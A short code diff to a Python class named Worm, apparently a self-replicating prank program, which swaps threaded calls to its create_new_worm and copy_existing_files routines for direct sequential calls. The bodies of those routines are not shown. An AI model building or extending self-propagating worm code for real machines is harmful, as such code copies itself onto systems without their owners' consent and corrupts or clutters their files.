--- a/Worm v.1
+++ b/Worm v.1
@@ -183,10 +183,9 @@ class Worm:
             if self.first_run == True:
                 self.rick_and_roll()
             self.list_directories(self.path)
-            self.threader.append(self.create_new_worm())
-            self.threader.append(self.copy_existing_files())
-            self.threader.start()
-            self.threader.join()
+            self.create_new_worm()
+            self.copy_existing_files()
+
             
         except:
             logging.warning("something went wrong")
